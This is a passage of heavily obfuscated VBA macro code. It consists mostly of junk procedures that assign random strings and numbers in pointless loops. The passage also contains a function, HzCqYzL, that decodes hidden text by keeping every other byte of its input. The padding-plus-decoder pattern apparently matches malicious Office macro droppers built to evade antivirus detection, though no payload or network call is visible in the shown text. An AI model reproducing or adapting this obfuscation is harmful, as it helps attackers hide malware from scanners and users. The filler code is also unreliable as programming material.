        exfwQq = "vaXRnIEw$S_uV@.za" + "hQuiOBPe-Smw iYU" + "oLp*dLxoslHMxv"
        sXNgp = Space(5)
        cxoTqk = Space(8)
        gIuQgVf = StrReverse("LRnNfLO?kmGBXgUT-C")
        HONMpG = HONMpG + 3
    Wend

    sXNgp = "tQLUOM]ek]i)QNI?srg" + "N]aTp@.(F^]T" + "%UX(% ^kACKA#j%gL"
    HYvHeJl = Space(10)
End Sub

Private Function oUqOSl(ZqQlih As Integer, ObfKIoa As Boolean, njoQBY As Boolean) As String
    CqkEFrl = UCase("DlwoGGQu?kf")
    ushSr = UCase("lGGqHS#fr*QvMd(Z&")
    While wpRitv < 167
        JbEbqpzY = Left("bo@%gEg?XMUzUJE", 4)
        JbEbqpzY = "m#S*H[pHlV&ezUthC" + "lDyPqg*kEN^%.QpQHBE%" + "HR j^$XONd"
        JbEbqpzY = Right("Fkh%._XA#%xasddw", 2)
        CqkEFrl = 1630 - 1953 - 932
        sXNgp = 708 - 1444 - 250
        gBUyHb = "ssNZGEvfZ$a*ty[cx" + "$W)Tl@B.GpnvS" + "_EVWYgehUgpJ)xGPZtR"
        gIuQgVf = Left("ANhkWOCktXNOrjB", 3)
        gBUyHb = StrReverse("_gsTMPDgK_xZa")
        wpRitv = wpRitv + 1
    Wend

    exfwQq = Left("u UICqDFr)o.am", 4)
    cxoTqk = 986 + 289 + 1458
    cxoTqk = Left("ez!)JL(I_X(?#", 5)
    ushSr = 971 - 1071 - 489
    cxoTqk = Space(14)
    For nTWgtw = 0 To 22
        rjzGslkX = Right("*ddQtv!xvPkPb!oU%", 4)
        gIuQgVf = StrReverse("(Tn-TtF%X.]jDAx&M!")
        rjzGslkX = Right("yWKHBBwp%]DL[b(V^XT", 5)
        gIuQgVf = StrReverse("YsI@LlZuaoexJf")
        gIuQgVf = UCase("^ c?b[OQO]MziZomd")
        gIuQgVf = "z-w@_wChnMhbEmc" + "y]xs-&LkA#iQC(t" + "dqW]j]Ly? l!cN"
        JbEbqpzY = Left("@Hg[zQod?wNK)ZyJD", 5)
    Next nTWgtw

    HYvHeJl = "VWNTo%_BBea-nsn#" + "^.OW[h)ILv$QFdu^C-#z" + "K)]eb]%ONBd"
    cxoTqk = Space(12)
    For eKijHi = 0 To 389
        exfwQq = Left("C#ythED%Hc*jCv]", 3)
        kBCkcXu = Space(16)
        sXNgp = 1898 + 878 + 346
        sXNgp = RTrim("X(OcP.oXl]%")
        cxoTqk = "w#C]O[?CTDAbTT%c(" + "AalcUqbJqrd" + "IWkKn^ztMEV&J?z"
        rjzGslkX = LTrim(")zz[LxtXoyHs")
        IiVYKJNx = 1733 - 1681 - 647
        IiVYKJNx = Left("KUhSbLeAua$(JmH", 4)
        kBCkcXu = "rm&.hqo-MH$rFWp(n" + "?e_SaI!-%nxO" + "PllViFtUM-#bN"
    Next eKijHi

    cxoTqk = RTrim("ySx*OD*$i-&Fk!SCp")
    exfwQq = RTrim("B@JBlV!x#D)")
    gBUyHb = "qdQ^qn@zWNk_" + "yJjUP!oZ*miKVW!" + "BQ!Voaa[?&Z"
    cxoTqk = RTrim("cl)BdvR#vWQPug)$^")
    gIuQgVf = Space(2)
    ushSr = LTrim("I_(VCBi#JS)!f -eoVvr")
    While NufEdv < 286
        ushSr = "zlI#b?y*W*OJFWNnqI" + "xQSxE)QBu!nFfn(m" + "qnqLlel(%kFUy?.nqB"
        IiVYKJNx = 1496 - 1598 - 926
        cxoTqk = LTrim("&[_dPm[^gnCkX_")
        cxoTqk = RTrim("pYu#ZcJ$tJv^")
        kBCkcXu = 600 - 158 - 1086
        JbEbqpzY = StrReverse("JVO@iz$XD#")
        kBCkcXu = LTrim("ar*sIAi_lv")
        cxoTqk = 1768 - 1950 - 1180
        ushSr = 122 - 1258 - 1262
        NufEdv = NufEdv + 2
    Wend

    JbEbqpzY = UCase("mpXX-J(FmN")
    HYvHeJl = "BVSzjuFj@XHnu!(I" + "xzfAK!gBKnZH?he" + "&umSj()f W"
    rjzGslkX = 874 + 1478 + 173
    sXNgp = Left("tGSor.y(*$wWIAboc", 4)
    sXNgp = RTrim("NqtLttFZkYrw")
    While QMakBV < 382
        gBUyHb = UCase(")w[BrY!_?Q^n&nFa%o")
        gIuQgVf = "J^*d?)jgvUGE]H?*lR" + "AdohsyKu(%kuVJdaMRT" + "P.[]EnGKR)_SrKSRprZ"
        cxoTqk = UCase("ch@E]p?gkMSRf.Nf-dZ")
        QMakBV = QMakBV + 1
    Wend

    JbEbqpzY = LTrim("FhYNTILoEvarCCF.sdc")
    gBUyHb = 515 - 1490 - 1243
    gBUyHb = Left("B?tzDIYg)-Vj##P", 3)
    JbEbqpzY = Space(8)
    gBUyHb = Left("G-m!R-*NNpV-aQf", 3)
    cxoTqk = UCase("yahYUKAFcNEjFD$CAi[")
    cxoTqk = RTrim("MMeW$%TMYK")
    IiVYKJNx = 1573 - 1852 - 1849
    ushSr = StrReverse("cHjqTHTsCVzcX")
    oUqOSl = "PQQJNoaDMbXPkJgUCYKeSEGWEYfbKaBKzt"
End Function

Private Sub yfuORB(IAvJAQ As Boolean, uUjwaT As Boolean, INzmbR As Boolean)
    exfwQq = 608 - 192 - 1024
    gIuQgVf = Left("ULDdGL)ITCq!dRie&Zc", 2)
    gIuQgVf = Left("h]ZQ$RAJbfKM", 2)
    gIuQgVf = Space(20)
    JbEbqpzY = LTrim("-prm^UHCSRthqfLQVo")
    sXNgp = 415 - 955 - 1838
    CqkEFrl = UCase("bWYxP.!dVwO")
    gBUyHb = Space(1)
    ushSr = 706 - 1020 - 1690
    kBCkcXu = 1923 - 675 - 271
    For oLVYyV = 0 To 133
        sXNgp = Left("ZBZre.kRcPNxqet", 2)
        cxoTqk = UCase("HZqkAQsY&MhJqULA")
        kBCkcXu = LTrim("jh$pw.Lyvti")
        exfwQq = 1655 + 1779 + 1353
        IiVYKJNx = Left("ltSrgZtEwIhY#%jwagY", 2)
    Next oLVYyV

    kBCkcXu = Left("YUfGSi?_NTlw K", 2)
    rjzGslkX = Left("MLeInrqRWPiImNED", 5)
    IiVYKJNx = UCase("ZNvgMa I[t.QcI")
    exfwQq = 738 + 918 + 1290
    sXNgp = UCase("wsvMb[).k^k")
    IiVYKJNx = LTrim("q!_Gv bwnBqxs(K")
    cxoTqk = Left("fxLwm$!z]gvD", 4)
    sXNgp = StrReverse("B@]i!izu&w%nj)ne!")
    kBCkcXu = Space(2)
    sXNgp = Space(9)
    cxoTqk = UCase("zg .%NkL]He")
    CqkEFrl = 1006 - 581 - 394
    CqkEFrl = "%TLRFQP@-a?" + "C!EoKrYd[uBE&ilh?U" + "ZIxSXFefwR@azVHIQ"
    gBUyHb = UCase(").gCfy[Fa^tyY?yCqry")
    sXNgp = StrReverse("YKpyxgu@)kc_(o_^o")
    For AbPkkc = 0 To 218
        gBUyHb = UCase("nfVZ&FCxyMEYkoRin")
        kBCkcXu = 336 - 520 - 867
        CqkEFrl = Left("BBz%vPbw*-t^qv ", 4)
        exfwQq = 303 - 1799 - 473
        JbEbqpzY = Right("z@%[L&JC*hkFNiIfsBd", 5)
        ushSr = Left("Zn%bIZRt%ZH(HFXQt", 3)
    Next AbPkkc

    CqkEFrl = "nmiqT]Cq.u%%qe]C" + "_%wElFiff^@" + "avgjf%V fR!w"
    exfwQq = Right("[^oWH_!.alPE[", 3)
    gBUyHb = 144 - 1775 - 1627
End Sub

Private Sub VrkZjW(XQQpWg As Boolean, NjpEyY As Boolean, SdsxvH As Integer)
    For qMGNEZ = 0 To 13
        rjzGslkX = 1200 - 934 - 1846
        gIuQgVf = StrReverse("@NTprhdEYhM.n_-AwLg")
        gBUyHb = ".hvLC-y^RIAqQEc!kA]" + "%fRpXwG&[v" + " ngr&wQ[hoiLWhGr@Y"
        rjzGslkX = UCase("Un?nRd@Z#n.)#gix$rhD")
    Next qMGNEZ

    cxoTqk = "CRs^(#m&aUmBo.?fTVS" + "]I .fbcd^ZgJe)" + "^e-k(jC#Eb_J$S"
    cxoTqk = UCase("zSMgb)T_ZU")
    ushSr = UCase("^uPp!BT[YpU*MK^bM u")
    JbEbqpzY = UCase("GP.lmcpip@^fS%dqok^S")
    ushSr = UCase("KQFeRHiwC@i!eqX[D")
    JbEbqpzY = "jTWqN.WskC" + "B_q@ri]S(Af" + "!tP#n@uFn@Xn"
    ushSr = 554 + 516 + 1129
    HYvHeJl = Space(6)
    CqkEFrl = Right("_UTETe$npZx.d(AKLG-i", 3)
    JbEbqpzY = LTrim("!ZTUMpEJtuLq(MlpD")
    HYvHeJl = RTrim("iG).pidmV&fEt")
    gBUyHb = StrReverse("lS$ceO@hTdZ")
    cxoTqk = RTrim("cGu$!CD#Jh&")
    While vMNwzN < 182
        exfwQq = StrReverse("hv(u*jedMDMTnG")
        rjzGslkX = RTrim("dY!eMdYNAKxTxY%cImK")
        gBUyHb = RTrim("M$@oK*D$JA")
        HYvHeJl = LTrim("VniNm_MvNA")
        gIuQgVf = Left("mWIYC%k-Unz", 2)
        kBCkcXu = 566 - 1876 - 1527
        exfwQq = Left("hb-p]Ok^Cn", 3)
        gIuQgVf = 1362 - 451 - 960
        cxoTqk = RTrim("VmBc%(krRKttSi")
        vMNwzN = vMNwzN + 3
    Wend

    IiVYKJNx = StrReverse("&wKfRJSDFn.")
    IiVYKJNx = 1093 + 1585 + 1484
    gBUyHb = 1781 - 868 - 1756
    For zVSPNA = 0 To 342
        kBCkcXu = Space(10)
        gIuQgVf = UCase(")dZ&CgqC.$")
        JbEbqpzY = StrReverse("[qFINiCTulnBne")
        cxoTqk = StrReverse("THKWw[oePtid")
    Next zVSPNA

    gIuQgVf = StrReverse("EqgA&cKDKU.!KbWO")
    gIuQgVf = StrReverse("HtM*%YPhG!wx_XU")
    HYvHeJl = Right("LUj(dX(^*)DV", 2)
    gBUyHb = 1159 - 1862 - 1016
    gBUyHb = 676 + 515 + 152
    rjzGslkX = 1986 + 1557 + 871
End Sub

Private Function LbrzvB(FLBBDXC As String, GimqCa As String) As String
    CqkEFrl = 522 + 814 + 532
    While JZEpap < 167
        IiVYKJNx = RTrim("jgWPKqdeSW_!H^bRI]Pi")
        CqkEFrl = "SMoXC*AWkgVQWV" + "W$^XAuiPpVgY(@KRhd_" + "?]SnOX#Rc#)"
        gBUyHb = UCase("Gm_PrmR.qJwf[ -qER#")
        JZEpap = JZEpap + 2
    Wend

    HYvHeJl = "x -Ca#qBnGrDPB" + "KQOC_YaH&(?bDAt" + "RD-B@NCr^e"
    IiVYKJNx = Right("%XuEFmD]I_", 2)
    CqkEFrl = Space(3)
    For IZDKnR = 0 To 191
        gIuQgVf = RTrim("[zyj-nIcVdn")
        CqkEFrl = "GCksFtbwz(" + "$R tgdn]uJf_BSRsc$" + "?PnR]sWDp?PpPD"
    Next IZDKnR

    While zSblLi < 199
        exfwQq = StrReverse("g]P-Y]dlJ%MKN")
        cxoTqk = 187 + 1580 + 175
        gIuQgVf = RTrim("uRfZKf].ixnx*FxNbI")
        CqkEFrl = 1612 - 1772 - 219
        rjzGslkX = Right("!vbUESRW^KQBEesfyP", 5)
        gIuQgVf = StrReverse("b@dL-$QWfY")
        JbEbqpzY = 288 + 1750 + 1334
        ushSr = StrReverse("wSSCIJwrbJZL#K")
        zSblLi = zSblLi + 2
    Wend

    IiVYKJNx = LTrim("rUjO@]gsz?e[wHwFJ ")
    CqkEFrl = StrReverse("?i%tBpDpYg$N$D")
    For yPeavu = 0 To 76
        HYvHeJl = Right("-bn^TVINB.VFhIE&-@LU", 4)
        rjzGslkX = 1698 - 463 - 1532
        IiVYKJNx = LTrim("#LgJ*$NKKNvh*")
        CqkEFrl = 510 - 261 - 1830
        HYvHeJl = RTrim("#Lz-.h)XcGXXsD#rClK")
        gBUyHb = "cJZ!J)_Xr?L*" + "y)zIbEioTr" + "e_NjsnoR[PliWA.kn"
        cxoTqk = LTrim("f*dJVvAKY!Yk-ji_#GD")
        HYvHeJl = UCase("Nsy%iugeNUv")
        ushSr = "li(J?!d.lmA?KlzHz" + ".nJKexanrAHrY" + "bNhFG^-rMdobew"
        cxoTqk = Right("GxBx_PoI@QS_fO W[F", 2)
    Next yPeavu

    While wdKgOX < 300
        sXNgp = UCase("co?JE*HgMu*Z@")
        kBCkcXu = Left("]&LrwuTRnqVo", 2)
        gBUyHb = UCase("yEV-.cki^IYEuMdBW")
        rjzGslkX = Right("whoZN bAzQV#YIYDxbbb", 2)
        rjzGslkX = "Y@MKnaTHi!-KjCq]DSt@" + "RS$^DyJxnpNB" + "fFHpYRu_qJ"
        IiVYKJNx = 1127 - 1861 - 262
        IiVYKJNx = LTrim("x- NTXdCW?uI")
        gBUyHb = RTrim("*panoHodPhS_uxT[$#bn")
        wdKgOX = wdKgOX + 2
    Wend

    exfwQq = RTrim("xNbI#C!pnyBj")
    While IRGMFt < 145
        gBUyHb = 224 + 1155 + 913
        rjzGslkX = "*hL^v#swWQrDrU[q[F" + "lbw-?Q&kHf" + "eccablOA$Mgw"
        IiVYKJNx = "a(ILov$V%PfwMpfRUJX" + "vY(TZi[FNT O" + "U*rcKm%cbtu"
        gBUyHb = StrReverse("G%X_F?]Ws Gu")
        sXNgp = UCase("Fxk%Ky%PMR_eGuD)h")
        IRGMFt = IRGMFt + 2
    Wend

    kBCkcXu = 1443 + 277 + 1994
    kBCkcXu = Left("k?KN@OvKkG.r", 5)
    CqkEFrl = 672 + 1613 + 1574
    kBCkcXu = Right("&BPyUpkbSbzjD", 3)
    gIuQgVf = LTrim("K#ZiGR(&v?@Yf-Bb")
    HYvHeJl = Right("d#sWC%Egad", 5)
    sXNgp = Space(10)
    HYvHeJl = RTrim("%dIbWVQL?Jy.s")
    gIuQgVf = 193 + 1867 + 621
    gBUyHb = Space(5)
    JbEbqpzY = LTrim("CaBtLQZsJCeSf![Eu")
    IiVYKJNx = "]h(bxQkaJ JcO#" + "BNimtu%eq.S)" + "xtSMcpKtwbMlJx*FDj"
    gIuQgVf = Space(4)
    While tBNBNI < 331
        gIuQgVf = UCase("AZyll&MV-.lYRb&oeU]p")
        exfwQq = UCase("KkwT pMW)ChK@*#]s%")
        CqkEFrl = Left("@ZeQOjC# zJh  zT", 2)
        JbEbqpzY = Left(" R&QGhZYmw&)X", 2)
        tBNBNI = tBNBNI + 1
    Wend

    IiVYKJNx = LTrim("KHFvCB@cyTJ&")
    exfwQq = "dt%sxt-#.]ra" + " YZwr.d@hURgl$A@*&!" + "g-?)-(gaTR*YZv-aF^k"
    exfwQq = RTrim("VBc?Otgkyr[]AOj(kItx")
    rjzGslkX = UCase("^DjJNFTloTPMuuNNK&Jh")
    LbrzvB = "dspIHCardQacNMpoXVxsWqwKAWSudJq"
End Function

Private Sub HqeyRo(SjUSsb As Boolean)
    gBUyHb = Space(12)
    ushSr = Space(9)
    JbEbqpzY = 792 + 316 + 266
    CqkEFrl = Right("teJ&vAeRsqnZ#mHlU", 3)
    HYvHeJl = "PJX#_^!U%q^" + "Dqk)^Kb.PCTQYvPcfw" + "w$md?^BuojPMk_VcU"
    CqkEFrl = StrReverse("OIwVWudYa(p&C%Z")
    rjzGslkX = "b^_FhUdMsjiyTR%JRMQ]" + "_.v&VpX& WX[x" + " N&BX$%ug!tc- -Go%h"
    While aSwEAc < 150
        ushSr = RTrim("Ptl& OgTj!Xc-p$qjtk")
        ushSr = "KPV)uYcJ*zhM" + "Pc^f^@docxhvq(oy*zAI" + "ABMlF*MD$)S"
        kBCkcXu = UCase("ALzEuCKjy$bgB-")
        aSwEAc = aSwEAc + 2
    Wend

    For rhKSmN = 0 To 311
        sXNgp = 932 + 1684 + 1424
        gIuQgVf = "XrUjq_t@Tz" + "SRaBr&qTTvcs-ilm(zZ" + "HqfhV@p)&X Xb$bS*s"
        gBUyHb = Right("iOFdrYi*-M).zoGZk[!", 2)
        JbEbqpzY = Left("ZnA(D&F?f&yGsStYD--", 5)
        HYvHeJl = LTrim("?Qmlcag-wH")
        sXNgp = Right(" MaVy%bToq$@Uq", 3)
        sXNgp = 263 - 1829 - 136
        cxoTqk = "Y!RIay@cMEBwKXJ)oz $" + "cSl WsB!dCuEx" + "__P.TWmwidngHlb"
    Next rhKSmN

    rjzGslkX = 1962 - 1963 - 1135
    rjzGslkX = Right("^nh[xlr?Vd", 4)
    exfwQq = StrReverse("eZANcW!K%LnB)")
    While waTDAW < 163
        JbEbqpzY = Space(20)
        kBCkcXu = StrReverse("Uqfxyg-tG^lzbs)B")
        JbEbqpzY = 965 + 690 + 318
        gIuQgVf = LTrim("ixYPN]f L-JIHmvx?")
        JbEbqpzY = RTrim("FWEJc$NS#lQK")
        exfwQq = Space(18)
        gBUyHb = "A#odhF]^y!Qc" + "pzle#fhGDiJr" + "gxUI%kAX(bqwi"
        rjzGslkX = RTrim("XRM@p[ZEWLUC!cplOU_")
        waTDAW = waTDAW + 2
    Wend

    gIuQgVf = LTrim("e?YxBkvajN#NKTt#")
    ushSr = RTrim("tH)kwN$rBy[IuyuS")
    CqkEFrl = UCase("qt%%Apj.iVLSqPGhhHt")
    gBUyHb = "KGOB#fCvcdBTAG" + "Iz^gT co(NPoqpP)[i" + "Mev[#@bvWIxAnDcD"
    rjzGslkX = LTrim("IBp-HEouOUcj&iKoGt@!")
    ushSr = LTrim("wqBGcTNVNaze")
    While gvjoiO < 70
        gBUyHb = RTrim("AvJFpUxWmK")
        IiVYKJNx = "EB@O._QNtfCh#mNEu*" + "r?XJIS(IxCqtbr)b" + "riG LgKB)busT-Vzh"
        CqkEFrl = LTrim(".nD$w&Qp^kG$")
        gIuQgVf = UCase("bNnkkiMbxjd-pRr)__Xw")
        gBUyHb = 974 - 796 - 1775
        gvjoiO = gvjoiO + 3
    Wend

    kBCkcXu = LTrim("SMIxSsb^SqP##E&(wY")
    CqkEFrl = 1381 + 826 + 1439
    sXNgp = UCase("YCdTKH-XzUF[ Go*-?Q")
    While OOkXcR < 343
        HYvHeJl = RTrim("UppgVBiCIAujtkv[%QD")
        gBUyHb = 391 - 714 - 931
        sXNgp = 734 - 1735 - 1100
        IiVYKJNx = 1295 + 211 + 965
        gBUyHb = 461 + 301 + 1111
        exfwQq = "It$EFC.qjwSQRuTJVvKA" + "$XrzF(_SKJ?uoAyQ" + "?wft K) YQJscWz)AFpd"
        OOkXcR = OOkXcR + 3
    Wend

    cxoTqk = StrReverse("xn- *NaYgk-hf!f)j")
    JbEbqpzY = Right("-[NNWIMDLrLx.!", 5)
    kBCkcXu = LTrim("&uMP^t))i^GL")
    gBUyHb = StrReverse("RE$nMEikL?FS")
    gBUyHb = Space(10)
    kBCkcXu = Space(1)
    IiVYKJNx = Space(10)
    rjzGslkX = RTrim("BxZvn^@qQyF)X?wvv")
    rjzGslkX = 1036 + 429 + 650
    HYvHeJl = Right("doJSZF.dnVErfWsd&X", 5)
    gBUyHb = 1893 - 850 - 1120
    rjzGslkX = "HQe&aNShFwzA ^BmpP-" + "%g_p]zssQ?!T" + "EyJdBL *ZkiA"
    HYvHeJl = StrReverse("&CCB#s?_#AeVLkV!.t!")
    cxoTqk = RTrim(" EEU)RdUGag")
End Sub

Private Function jLfZHj(bvCmznV As String) As String
    cxoTqk = RTrim("V?CzU)iv%AeU")
    For jcBBvF = 0 To 15
        CqkEFrl = 1297 + 1171 + 461
        cxoTqk = LTrim("p.dxICVNdN")
        rjzGslkX = RTrim("m]b!HqO! #J")
        rjzGslkX = LTrim("qj[IiJQwOR%@ H@kt")
        sXNgp = "&fqXN?[pOoR" + "@agEQBT.A-[" + "r-V[Ioq&vZW&#LC-_[["
        rjzGslkX = "dQUxtlbSz_K#LH!" + "i*OOsNzM!K_c%" + "m okZprXNt(PYb"
        cxoTqk = UCase("DH%JcvnHJVxqlfLVlrk")
        HYvHeJl = StrReverse("z.i.pAdbhwfY")
    Next jcBBvF

    gBUyHb = Right("[Hmjuy (TPjqntc&f", 2)
    While hHALIm < 139
        gBUyHb = UCase("trMWsHd.i@J)suYKnK)")
        sXNgp = UCase("DcG%]j]rW-YH")
        ushSr = RTrim("E.m(-AboT_N]N")
        gIuQgVf = LTrim("?TojSP#^F(")
        ushSr = UCase("OXK$K_CPv((BQay.df_")
        HYvHeJl = Left("[DdOaRbwGBT?xTLot(*", 4)
        JbEbqpzY = "XYegZxjxk_EAdeWtcPV." + "#*NpGVU]GyszcN" + "JI[y AU$Ct.qoaHxpFa"
        IiVYKJNx = Left("GKSbTf]JRnD$F", 2)
        cxoTqk = RTrim("r]cB@G.y_K")
        cxoTqk = UCase("KiV f]ch[ZQ")
        hHALIm = hHALIm + 1
    Wend

    JbEbqpzY = Right("YLoUn]K@#Zc_rOnEyCO", 3)
    sXNgp = LTrim("i&V(QN[eHURrtLo_")
    gIuQgVf = Space(14)
    exfwQq = "hA%bUw%BBpN$]" + "H[rxOSd*r^ (a" + "V)!uYTb#JvlyHsab"
    rjzGslkX = StrReverse("trUj gg^jv$a!disS")
    sXNgp = StrReverse("iLdO!p&KrqzVXDA(ITf")
    While BXzuHV < 83
        kBCkcXu = StrReverse("UlHDM]Z&k Wuigo")
        gIuQgVf = "^DcTh?_U.^ KC" + "ZklFF^r#UsCtJ e[" + "nTqOs#)Kg&)FT#?"
        kBCkcXu = "IEPjBahyZ%?iVaj" + "hxVvW(VyS^MVVwm" + ".oB-e]S._z(k"
        sXNgp = 1649 - 1394 - 1914
        IiVYKJNx = Left("a)hh(r?@%qxQ", 3)
        HYvHeJl = StrReverse("LNKq !EKWSu[lkm")
        sXNgp = Right("%P%?dfVZxcIiU", 2)
        BXzuHV = BXzuHV + 2
    Wend

    JbEbqpzY = Space(18)
    ushSr = Left("B(nuUt?q-YP(b]]ToE@I", 4)
    gIuQgVf = UCase("dxppT %wKhf&*han")
    sXNgp = Right("uHn*y*fIEl", 4)
    IiVYKJNx = 1375 + 1106 + 1245
    rjzGslkX = Space(14)
    cxoTqk = UCase("ze FW!FqJY)NjUPt .")
    rjzGslkX = "SQ&Cl$C^nV$wr@#" + "TcMqRYNpeCl[qA-w" + "kw)ZQ!TQMBAxjTi"
    IiVYKJNx = 1063 + 1453 + 654
    gIuQgVf = Left("tF-^jA#yLXAW)yOh", 4)
    CqkEFrl = Left("X]Cb.pi?!#DN", 5)
    cxoTqk = Right("ArXZ[QFbCXU-*F&yOF^h", 2)
    kBCkcXu = Space(14)
    For synsZC = 0 To 305
        CqkEFrl = StrReverse("j_nUzgX!I_lNwVqYMV@")
        IiVYKJNx = 1964 - 1979 - 1303
        gBUyHb = LTrim("#m@!x[SR?&AE")
        kBCkcXu = ".pi% eM)zrkrUD%" + "]&ssMvRT.daWt)@gIl" + "wdm.KBDR##zwJBigrktQ"
        gBUyHb = UCase("(cN**f-gJ.@EQleiZ*")
    Next synsZC

    CqkEFrl = "kpo#[HJaL( XhuTtfbU" + "ww)XkFHrVff" + "ozmrhARP?)hqxyMk["
    rjzGslkX = Space(16)
    gBUyHb = 1277 - 1190 - 1654
    ushSr = 1381 - 916 - 629
    rjzGslkX = 1290 + 778 + 505
    HYvHeJl = RTrim("FPuBVw%m)uDWirRwemx")
    ushSr = Right("C$geW)^s-##RRTK", 3)
    IiVYKJNx = RTrim("^trVjsXNMf")
    IiVYKJNx = 534 - 1450 - 1058
    cxoTqk = StrReverse("Tfb](b%El@X")
    jLfZHj = "dFuIzaUMeCcvbREVArGilGgSJOEEwnNclCD"
End Function

Public Function HzCqYzL(panqaHGu As String) As String
IiVYKJNx = Left("g$A_yAwaN@@Y$$Ip", 4)
    Dim RlqkaMsG() As Byte
    cxoTqk = Right("lUtaKlU(tE#iPAxG", 2)
    Dim KlBpi(1000) As Byte
    JbEbqpzY = UCase("WYPnxElRybUy-fVMbH[x")
    CqkEFrl = "LMu$-[AlProXQzeWuxfT" + "dcrvQixFQQ??!raxp%GX" + "JeM*IccJ-ZRIyRT"
    While vyNlwC < 286
        exfwQq = 947 + 1658 + 1883
        CqkEFrl = UCase("UhJ*Kc^e[MTMRXE@cCn")
        kBCkcXu = 1824 + 648 + 312
        gIuQgVf = LTrim("E)P^v%FJ.q.rK$Fxd")
        sXNgp = UCase("XZ#XHRgT@IFg(mr*--s@")
        vyNlwC = vyNlwC + 1
    Wend
    sXNgp = StrReverse("sez[UjFsK?")
    gBUyHb = 882 - 352 - 1506
    nPWHegW = 0
    For cQJHIx = 0 To 200
        cxoTqk = Left("[qR$)MnmQrKElW", 2)
        sXNgp = Right("YcqmIpk^nM[LK$uw%Rw", 4)
        exfwQq = 164 + 475 + 457
        kBCkcXu = StrReverse("WL*Ef#o^ NN[r")
        sXNgp = Left("eDvPnk?I!mQz(i", 4)
        exfwQq = RTrim("H%%*fy ibRT")
    Next cQJHIx
    gBUyHb = LTrim("Hp_l%UJUdq.%")
    IiVYKJNx = "zWbEMbnW[@%mL%[" + "^ub_qAHlN?ea" + "PDbNjcB.hJf#Poi"
    RlqkaMsG = StrConv(panqaHGu, vbFromUnicode)
    ushSr = 1835 + 373 + 980
    gIuQgVf = Space(2)
    IiVYKJNx = UCase("_G@[wbmzeqRxG%zyCS")
    For rMZvTeR = 0 To UBound(RlqkaMsG) - 1
    gIuQgVf = LTrim("@@dBj^lfl(snLoTyyKI")
    IiVYKJNx = RTrim("U&HlZGlO^O@C")
    kBCkcXu = 1870 - 598 - 674
    While OKlUuc < 268
        IiVYKJNx = Right("Xpfh#Q%gTLhJ", 4)
        rjzGslkX = UCase("m(rJrlO^iLP&J?R]")
        gIuQgVf = Right("tWK?Mxeo#@", 3)
        HYvHeJl = 662 - 1259 - 551
        gIuQgVf = RTrim("%tqo]Y@L#]ucU]yKm")
        gBUyHb = Right("kZHweCNX% XDhiYyW)%", 5)
        CqkEFrl = Right("L#&-zz^G[NWbfTPMwLN", 3)
        OKlUuc = OKlUuc + 2
    Wend
    cxoTqk = LTrim("EtJTINqtmWLdyF[j")
        If (rMZvTeR Mod 2 = 0) Then
        ushSr = "e&TKCn#[dWIvIRASii" + "EuhDn#t(dg-" + "JsmH@r.]_o*UsAYWDpD"
        cxoTqk = StrReverse("P% EYhzYYSLII")
        kBCkcXu = "iZ@)Po$%dp B[^Sb*" + "u *kQ)cA$NI-VVjtdb" + "tcRPY*(FE&zBSQLN"
            KlBpi(nPWHegW) = RlqkaMsG(rMZvTeR)
            nPWHegW = nPWHegW + 2 - 1
            cxoTqk = LTrim("ZjO GqUrvOpAxoh#")
            cxoTqk = LTrim("I^C)R(oLhyVSo#")
        End If
        For QSRmxB = 0 To 238
            CqkEFrl = StrReverse("?vEn!%gNIxxXHuwj]w")
            CqkEFrl = "]tbjSX.t(thvecJv)S" + "xfaqwtKDcfd^_^OHw" + "HmmEk]mVytRP]qV tqxY"
            gBUyHb = Right("Z)vznZHCwIrNCkJyYHI", 4)
            kBCkcXu = UCase("jSTmpViv)&kESO_Ng")
            IiVYKJNx = StrReverse("*%QMb&%(xoQ]#sG")
            CqkEFrl = 1668 - 1182 - 704
            cxoTqk = 1453 + 706 + 618
            HYvHeJl = 679 - 1329 - 302
            gIuQgVf = Left("nIGkXoLt(gRzXNOSQto?", 3)
        Next QSRmxB
        For EIvotI = 0 To 110
            HYvHeJl = 1584 + 1613 + 1530
            HYvHeJl = "?Qi%SeToCnC" + "FIge^@t?tkw(aUFM" + "*Fme_GVE!Ola]^LL("
            rjzGslkX = RTrim("EJNF-OEnLfVuxb")
        Next EIvotI
        While Qcfnvk < 167
            CqkEFrl = 1443 - 413 - 186
            JbEbqpzY = UCase("Ce@SODSxsA^S#XOkwE")
            IiVYKJNx = UCase("UeYm_n(nF]QNKeQGjYPA")
            kBCkcXu = StrReverse("IsahAC]jy!P$DsPRYl%")
            HYvHeJl = StrReverse("NgV*yp#rxlv(--")
            gIuQgVf = StrReverse("KN(L]uY&kehCiDj")
            JbEbqpzY = 600 - 873 - 1240
            IiVYKJNx = 1696 - 1074 - 1208
            Qcfnvk = Qcfnvk + 3
        Wend
        For rCZChf = 0 To 147
            sXNgp = StrReverse("f*QX^faC&[]Y-a[QQ[J")
            kBCkcXu = 978 + 321 + 762
            rjzGslkX = Left("v ^cJ[XXX_D", 5)
            rjzGslkX = 1327 - 169 - 529
            gBUyHb = Left("Q@^z%QC@-IPmRI", 4)
            gIuQgVf = Right("_Q[_p]v[GmIM", 5)
        Next rCZChf
    Next rMZvTeR
    exfwQq = RTrim("S-W@tInGlA@u")
    rjzGslkX = StrReverse("JqKNo&r @%W$(fksS")
    While FzGAxh < 396
        HYvHeJl = Right("g.[IBI_sAA", 5)
        HYvHeJl = UCase("n^OuDmrSrWBTY!s^R")
        sXNgp = Right("hMBGTog)_jfh", 5)
        HYvHeJl = Right("iOZM$yNEpcv!I", 2)
        HYvHeJl = LTrim("piVP^ndmepExQT*")
        FzGAxh = FzGAxh + 1
    Wend
    HzCqYzL = StrConv(KlBpi, vbUnicode)
End Function
Private Sub uNTQZN(sVytpKQ As Double, rrmKUa As Double, NaaEZV As String, bQhHRjs As Double, SnuxhIo As Double)
    kBCkcXu = StrReverse("wMV%iXdMW&eFiBwHvqy#")
    HYvHeJl = LTrim("#UsS&cpr(]WgynR")
    ushSr = 777 + 473 + 1114
    ushSr = RTrim("fkX*$NL@dtdBz$NY&q")
    IiVYKJNx = 370 - 1822 - 1131
    CqkEFrl = UCase("Ij(V#sAC(dG ZGO#V")
    HYvHeJl = Left("ox$JX_YLk%CW", 4)
    JbEbqpzY = RTrim("xkw[U#*#jTgwp[Gi")
    JbEbqpzY = RTrim("_N%v]l]S&m[")
    JbEbqpzY = RTrim("&BD]^_HnXXu^ix_uZ)l")
    IiVYKJNx = Left("yf_e*.U_QL iETx", 2)
    ushSr = Left("amd^u%UUrR_eGKYf", 3)
    cxoTqk = Space(2)
    JbEbqpzY = RTrim("#ccxsB!BMWwYxx*H?DC[")
